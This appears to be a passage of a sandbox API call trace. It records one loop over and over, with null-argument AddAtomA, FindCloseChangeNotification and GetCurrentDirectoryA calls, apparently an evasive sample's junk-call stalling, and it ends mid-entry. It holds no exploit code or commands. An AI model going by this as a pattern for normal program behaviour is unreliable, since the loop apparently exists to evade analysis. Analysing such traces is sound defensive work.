AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.022] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.022] AddAtomA (lpString=0x0) returned 0x0 [0082.022] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.023] AddAtomA (lpString=0x0) returned 0x0 [0082.023] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.023] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.024] AddAtomA (lpString=0x0) returned 0x0 [0082.024] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.024] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.025] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.025] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.025] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.026] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.026] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.026] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.027] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.027] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.027] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.027] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.027] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.027] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.027] AddAtomA (lpString=0x0) returned 0x0 [0082.027] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.028] AddAtomA (lpString=0x0) returned 0x0 [0082.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.028] AddAtomA (lpString=0x0) returned 0x0 [0082.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.028] AddAtomA (lpString=0x0) returned 0x0 [0082.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.028] AddAtomA (lpString=0x0) returned 0x0 [0082.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.028] AddAtomA (lpString=0x0) returned 0x0 [0082.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.028] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.028] AddAtomA (lpString=0x0) returned 0x0 [0082.028] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.029] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.029] AddAtomA (lpString=0x0) returned 0x0 [0082.029] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.030] AddAtomA (lpString=0x0) returned 0x0 [0082.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.030] AddAtomA (lpString=0x0) returned 0x0 [0082.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.030] AddAtomA (lpString=0x0) returned 0x0 [0082.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.030] AddAtomA (lpString=0x0) returned 0x0 [0082.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.030] AddAtomA (lpString=0x0) returned 0x0 [0082.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.030] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.030] AddAtomA (lpString=0x0) returned 0x0 [0082.030] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.031] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.031] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.031] AddAtomA (lpString=0x0) returned 0x0 [0082.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.032] AddAtomA (lpString=0x0) returned 0x0 [0082.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.032] AddAtomA (lpString=0x0) returned 0x0 [0082.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.032] AddAtomA (lpString=0x0) returned 0x0 [0082.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.032] AddAtomA (lpString=0x0) returned 0x0 [0082.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.032] AddAtomA (lpString=0x0) returned 0x0 [0082.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.033] AddAtomA (lpString=0x0) returned 0x0 [0082.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.033] AddAtomA (lpString=0x0) returned 0x0 [0082.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.033] AddAtomA (lpString=0x0) returned 0x0 [0082.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.033] AddAtomA (lpString=0x0) returned 0x0 [0082.033] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.033] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.034] AddAtomA (lpString=0x0) returned 0x0 [0082.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.034] AddAtomA (lpString=0x0) returned 0x0 [0082.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.034] AddAtomA (lpString=0x0) returned 0x0 [0082.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.034] AddAtomA (lpString=0x0) returned 0x0 [0082.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.034] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.034] AddAtomA (lpString=0x0) returned 0x0 [0082.034] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.035] AddAtomA (lpString=0x0) returned 0x0 [0082.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.035] AddAtomA (lpString=0x0) returned 0x0 [0082.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.035] AddAtomA (lpString=0x0) returned 0x0 [0082.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.035] AddAtomA (lpString=0x0) returned 0x0 [0082.035] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.035] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.036] AddAtomA (lpString=0x0) returned 0x0 [0082.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.036] AddAtomA (lpString=0x0) returned 0x0 [0082.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.036] AddAtomA (lpString=0x0) returned 0x0 [0082.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.036] AddAtomA (lpString=0x0) returned 0x0 [0082.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.036] AddAtomA (lpString=0x0) returned 0x0 [0082.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.036] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.036] AddAtomA (lpString=0x0) returned 0x0 [0082.036] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.037] AddAtomA (lpString=0x0) returned 0x0 [0082.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.037] AddAtomA (lpString=0x0) returned 0x0 [0082.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.037] AddAtomA (lpString=0x0) returned 0x0 [0082.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.037] AddAtomA (lpString=0x0) returned 0x0 [0082.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.037] AddAtomA (lpString=0x0) returned 0x0 [0082.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.037] AddAtomA (lpString=0x0) returned 0x0 [0082.037] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.037] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.038] AddAtomA (lpString=0x0) returned 0x0 [0082.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.038] AddAtomA (lpString=0x0) returned 0x0 [0082.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.038] AddAtomA (lpString=0x0) returned 0x0 [0082.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.038] AddAtomA (lpString=0x0) returned 0x0 [0082.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.038] AddAtomA (lpString=0x0) returned 0x0 [0082.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.038] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.038] AddAtomA (lpString=0x0) returned 0x0 [0082.038] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 